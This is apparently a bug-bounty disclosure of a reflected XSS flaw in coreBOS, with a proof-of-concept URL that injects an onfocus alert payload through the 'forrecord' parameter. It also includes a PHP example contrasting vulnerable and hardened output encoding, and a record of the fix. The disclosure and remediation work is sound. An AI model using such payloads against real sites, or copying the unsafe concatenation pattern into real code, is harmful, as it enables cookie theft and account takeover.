Cross-site Scripting (XSS) - Reflected in tsolucio/corebos

Valid

Reported on

Oct 31st 2021


Description

Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites.

Proof of Concept.

// PoC.js
Link --> http://demo.corebos.com/index.php?module=cbSurvey&action=cbSurveyAjax&file=index&ajax=true&search=true&gname=&query=true&search_field=cbsurveyname&searchtype=BasicSearch&operator=s&type=alpbt&search_text=L&form=&forfield=&srcmodule=&forrecord=xss%22%20autofocus/onfocus=%22alert(5)%22%20id=%27xxx

Vulnerable parameter --> forrecord

Impact

This vulnerability can be used to steal other users' cookies and to carry out other advanced scenarios. Account takeover is possible in this case.
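An added example, not coreBOS code and not the merged fix: it shows output encoding and input validation for a value like forrecord. It assumes the parameter is echoed into a double-quoted HTML attribute, which the quote characters in the reported value suggest; the hidden-input markup, the function names and the numeric-id rule are assumptions.

```php
<?php
// Added illustration; not coreBOS code. The hidden-input markup and the
// function names are assumptions made for this example.

// Vulnerable pattern: the request value is concatenated into a
// double-quoted attribute, so a '"' in the value ends the attribute and
// the rest is parsed as new attributes (autofocus, onfocus, ...).
function render_unsafe(string $forrecord): string
{
    return '<input type="hidden" name="forrecord" value="' . $forrecord . '">';
}

// Hardened pattern: encode for the HTML attribute context. ENT_QUOTES
// encodes both quote characters; ENT_SUBSTITUTE replaces invalid UTF-8
// sequences instead of returning an empty string.
function render_safe(string $forrecord): string
{
    $encoded = htmlspecialchars($forrecord, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="forrecord" value="' . $encoded . '">';
}

// Stricter option if the field only ever holds a numeric record id
// (an assumption about forrecord): reject anything else before use.
function normalize_record_id(string $forrecord): ?string
{
    return preg_match('/\A[0-9]{1,19}\z/', $forrecord) === 1 ? $forrecord : null;
}

// The forrecord value from the report's link, URL-decoded.
$reported = 'xss" autofocus/onfocus="alert(5)" id=\'xxx';

// Compare the two renderings: only the second keeps the whole value
// inside the value="..." attribute.
echo render_unsafe($reported), PHP_EOL;
echo render_safe($reported), PHP_EOL;

// Validation rejects the reported value and accepts a plain id.
var_dump(normalize_record_id($reported));
var_dump(normalize_record_id('42'));
```

Encoding has to match the output context: htmlspecialchars covers HTML text and quoted attributes, but a value placed inside a script block or a URL needs the encoder for that context instead.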

Joe Bordes validated this vulnerability a month ago
0x9x has been awarded the disclosure bounty
The fix bounty is now up for grabs
0x9x
a month ago

Researcher


Thanks for your help too!

Joe Bordes confirmed that a fix has been merged on dcd094 a month ago
Joe Bordes has been awarded the fix bounty